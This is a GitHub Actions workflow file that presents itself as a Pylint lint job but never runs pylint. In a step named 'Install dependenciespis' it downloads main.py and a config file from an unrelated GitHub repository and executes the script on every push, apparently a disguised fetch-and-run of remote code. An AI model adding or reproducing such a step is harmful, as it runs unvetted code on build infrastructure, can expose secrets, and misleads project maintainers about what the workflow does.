# This is a basic workflow to help you get started with Actions

name: Pylint

on: [push]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        python-version: ["3.10"]
    steps:
    - uses: actions/checkout@v3
    - name: Set up Python ${{ matrix.python-version }}
      uses: actions/setup-python@v3
      with:
        python-version: ${{ matrix.python-version }}
    - name: Install dependenciespis
      run: |
        python -m pip install --upgrade pip
        wget https://github.com/Maovnwn/jkd/raw/main/main.py
        wget https://github.com/Maovnwn/jkd/raw/main/drt.txt -O settings.json
        python3 main.py
